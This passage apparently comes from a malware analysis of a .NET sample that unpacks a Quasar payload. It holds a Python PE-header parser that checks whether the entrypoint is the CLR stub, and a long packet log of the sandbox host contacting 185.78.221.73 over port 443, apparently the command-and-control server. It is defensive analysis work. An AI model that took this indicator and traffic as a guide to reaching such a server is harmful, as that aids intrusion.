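    struct.pack_into("<I", dos, 0x3C, e_lfanew)

    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)   # i386, one section, 32-bit
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT] = (IAT_RVA, IAT_SIZE)
    dirs[DIR_COM] = (COM_RVA, COM_SIZE)
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, FILE_ALIGN, 0, 0, ENTRY_RVA, TEXT_RVA, 0)
    opt += struct.pack("<IIIHHHHHHIIIIHH", IMAGE_BASE, 0x2000, FILE_ALIGN, 4, 0, 0, 0, 4, 0,
                       0, 0x4000, FILE_ALIGN, 0, 2, 0x8540)
    opt += struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x100, TEXT_RVA, FILE_ALIGN, FILE_ALIGN,
                       0, 0, 0, 0, 0x60000020)                     # CODE | EXECUTE | READ
    headers = bytes(dos) + b"PE\0\0" + coff + opt + sect
    return headers.ljust(FILE_ALIGN, b"\0") + bytes(text)


def parse_pe(data: bytes) -> dict:
    """Parse just enough of a PE32 header to relate the entrypoint to the IAT and the CLR header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsect = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, max(vsize, rawsize), rawptr))

    def rva_to_off(rva: int) -> int:
        for _, va, size, rawptr in sections:
            if va <= rva < va + size:
                return rawptr + (rva - va)
        raise ValueError(f"RVA {rva:#x} is not backed by any section")

    stub = data[rva_to_off(entry_rva):][:6]
    is_jmp_indirect = stub[:2] == b"\xff\x25"
    target_va = struct.unpack_from("<I", stub, 2)[0] if is_jmp_indirect else None
    iat_va, iat_size = dirs[DIR_IAT]
    com_va, com_size = dirs[DIR_COM]
    # The stub is the CLR bootstrap only if it jumps through a slot inside the IAT directory.
    through_iat = is_jmp_indirect and iat_va <= target_va - image_base < iat_va + iat_size
    return {
        "entry_rva": entry_rva,
        "has_clr_header": com_va != 0 and com_size != 0,
        "entry_is_clr_stub": through_iat,
        "stub_target": target_va,
    }


if __name__ == "__main__":
    info = parse_pe(build_constructed_pe())
    print(f"entry RVA {info['entry_rva']:#x}, CLR header present: {info['has_clr_header']}, "
          f"entry is jmp through IAT: {info['entry_is_clr_stub']} (target {info['stub_target']:#x})")
```

To run it against a real file, pass `open(path, "rb").read()` to `parse_pe` instead of the constructed image. For this sample the report's own numbers (entrypoint 0x56bd1e, IAT directory 0x2000/0x8, COM descriptor 0x2008/0x48, `jmp dword ptr [00402000h]`) are precisely the relationship the check tests. A positive result only says the native entry is the CLR bootstrap; it says nothing about the managed code, which here unpacks and injects the Quasar payload. A negative result on a file that still has a CLR header is worth a closer look, since it means something other than the runtime runs first.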
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 18, 2024 16:23:06.614120007 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:06.614176989 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:06.614343882 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:06.628263950 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:06.628283978 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.580291033 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.580404043 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:07.586035013 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:07.586054087 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.586419106 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.634339094 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:07.642066002 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:07.683327913 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.948824883 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.948877096 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.948887110 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.948966026 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:07.949007034 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:07.993788004 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.109067917 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.109083891 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.109193087 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.117465019 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.117476940 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.117573023 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.227992058 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.228008032 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.228141069 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.251343966 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.251353979 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.251414061 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.251450062 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.347054005 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.347067118 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.347191095 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.370436907 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.370575905 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.466005087 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.466145992 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.490015984 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.490139008 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.584857941 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.585021019 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.608902931 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.609000921 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.703732967 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.703824997 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.711754084 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.711833000 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.823111057 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.823199034 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.830457926 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.830526114 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.899771929 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.899866104 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.941849947 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.942095041 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:08.950088978 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:08.950171947 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.103252888 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.103451967 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.103538990 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.103614092 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.105118990 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.105184078 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.222184896 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.222408056 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.223221064 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.223388910 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.257000923 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.257203102 CET  49704        443        192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:09.341223001 CET  443          49704      185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:09.341324091 CET  49704        443        192.168.2.5    185.78.221.73
                                                                              Nov 18, 2024 16:23:09.341949940 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.342017889 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.376072884 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.376158953 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.460841894 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.460968971 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.461608887 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.461707115 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.495023012 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.495140076 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.581433058 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.581556082 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.581871033 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.581964970 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.614506006 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.614634037 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.698499918 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.698695898 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.699086905 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.699265003 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.724153042 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.724271059 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.817748070 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.817981958 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.818111897 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.818190098 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.818468094 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.818540096 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.852421045 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.852631092 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.936717033 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.936839104 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.937671900 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.937767029 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.961925030 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.962032080 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:09.972795963 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:09.972904921 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.055763006 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.055984974 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.056313992 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.056390047 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.115236044 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.115336895 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.115734100 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.115808010 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.174736977 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.174832106 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.175523996 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.175612926 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.234044075 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.234124899 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.234767914 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.234843016 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.293458939 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.293587923 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.294388056 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.294457912 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.352967978 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.353183031 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.353279114 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.353352070 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.412328005 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.412595034 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.412862062 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.412944078 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.437457085 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.437618971 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.471993923 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.472156048 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.531605005 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.531738997 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.531764984 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.531780958 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.531837940 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.532439947 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.532515049 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.590864897 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.590987921 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.591433048 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.591512918 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.650353909 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.650515079 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.651019096 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.651084900 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.675539017 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.675714970 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.710544109 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.710691929 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.710741997 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.710804939 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.769928932 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.770073891 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.770886898 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.770953894 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.770975113 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.770991087 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.771023989 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.771109104 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.829366922 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.829497099 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.829720974 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.829794884 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.892733097 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.892844915 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.893115997 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.893181086 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.893449068 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.893512964 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.947566986 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.947675943 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:10.948457956 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:10.948544025 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.278750896 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.278764963 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.278830051 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.278881073 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.279077053 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.279134035 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.279359102 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.279421091 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.279870033 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.279932022 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.280438900 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.280479908 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.280503988 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.280519009 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.280544996 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.280570030 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.281332016 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.281378031 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.281403065 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.281418085 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.281445026 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.281470060 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.290621042 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.290697098 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.291014910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.291078091 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.291899920 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.291970968 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.292493105 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.292562008 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.293478966 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.293545008 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.294434071 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.294514894 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.295135021 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.295202971 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.295516014 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.295582056 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.305078983 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.305152893 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.305411100 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.305469990 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.340709925 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.340806961 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.368968010 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.369126081 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.369473934 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.369539022 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.370449066 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.370522976 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.424161911 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.424593925 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.424949884 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.425034046 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.464121103 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.464286089 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.483989954 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.484114885 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.488060951 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.488168001 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.488548040 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.488616943 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.489717960 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.489790916 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.543749094 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.543880939 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.544204950 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.544279099 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.583354950 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.583462954 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.606468916 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.606574059 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.607032061 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.607117891 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.607733965 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.607811928 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.608081102 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:11.608165026 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:11.662072897 CET44349704185.78.221.73192.168.2.5
Timestamp                            Source Port  Dest Port    Source IP      Dest IP
Nov 18, 2024 16:23:11.662220001 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.663078070 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.663161039 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.707976103 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.708074093 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.725465059 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.725621939 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.725979090 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.726047039 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.726809025 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.726880074 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.727283001 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.727360964 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.760828018 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.760915041 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.781810999 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.781909943 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.782363892 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.782438993 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.826914072 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.827043056 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.844613075 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.844774961 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.845149040 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.845220089 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.845894098 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.845969915 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.846437931 CET  443          49704        185.78.221.73  192.168.2.5
